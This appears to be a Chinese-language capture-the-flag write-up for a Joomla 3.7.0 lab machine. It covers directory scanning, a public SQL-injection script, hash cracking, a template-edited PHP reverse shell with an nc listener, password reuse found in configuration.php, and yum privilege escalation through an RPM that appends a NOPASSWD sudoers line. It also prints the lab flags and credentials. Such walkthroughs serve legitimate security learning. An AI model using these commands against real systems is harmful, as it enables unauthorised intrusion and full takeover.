端口扫描

Web

谁抢了银行:SpiderMan

我直接:?????

日常进行目录扫描

gobuster dir -u http://10.10.74.159 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

扫出来大概是这些目录

THM问joomla的版本是多少,打开Wap插件看一下也确实是这个CMS

可以用joomscan来判断版本,kali中sudo apt-get install joomscan安装

joomscan -u http://10.10.74.159/

开启扫描

发现版本是3.7.0,而且也能列出目录

有了版本号就可以找漏洞了

searchsploit joomla 3.7.0

直接上github找个SQL注入的脚本

https://github.com/teranpeterson/Joomblah

得到密码hash

$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

hash-identifier竟然识别不出来

只能上这个网站找了,$2开头的搜索一下

https://hashcat.net/wiki/doku.php?id=example_hashes

得到密码是spiderman123

到之前扫目录得到的/administrator输入用户名jonah和密码之后成功登陆

进入install看看,发现可以上传文件

想传个reverse shell来着发现传不上去

Getshell

只能上网搜了一下,发现模板这里可以编辑PHP文件

试着把index.php文件改成reverse shell

先nc -lvnp 1234 开启一个监听

既然是index.php应该就是主界面了,还记得之前扫描有个/templates 目录,

于是访问http://10.10.74.159/templates/beez3/index.php 也就是我们更改PHP的目录来触发shell(至于这个目录也是上网查的233)

发现成功连接!

本来想进入/home/jjameson直接cat user.txt的,发现没有权限

whoami发现身份为“Apache”

那就先随处找找有没有其他线索

在/var/www/html也就是web服务器的目录发现了个configuration.php,应该是个服务器配置文件,打开看看

发现了一个password:nv5uz9r3ZEDzVjNu

试着看看有没有密码复用的可能

试了试root和jjameson,发现后者成功登录,那么就可以cat user.txt了

27a260fe3cba712cfdedb1c86d80442e

提权

sudo -l发现能够运用

https://gtfobins.github.io/gtfobins/yum/ 看看提权方法

大概又是把用户添加到sudo组然后执行所有命令

在kali中

echo 'echo "jjameson ALL=(root)NOPASSWD:ALL">>/etc/sudoers'>sudo.sh

要先安装fpm命令

sudo apt update
sudo apt install ruby ruby-dev build-essential
sudo gem install fpm
fpm -n x -s dir -t rpm -a all --before-install sudo.sh .

(别忘了“ .”)

python3 -m http.server开启本地服务器来上传RPM包

wget http://10.11.38.245/x-1.0-1.noarch.rpm

安装的时候发现,之前在kali的桌面运行打包命令,把桌面的所有东西都打包了,导致安装了特别久(悲,应该换个目录来运行的

然后sudo yum localinstall -y x-1.0-1.noarch.rpm进行安装

成功提权!

cat /root/root.txt

eec3d53292b1821868266858d7fa6f79

碎碎念

连续两个靶机都用到了把一个普通用户添加到sudoers组的方法进行提权,感觉还是挺重要的一个方法,挺中规中矩的一个靶机吧感觉,然后稍微了解了一点rpm,fpm之类的东西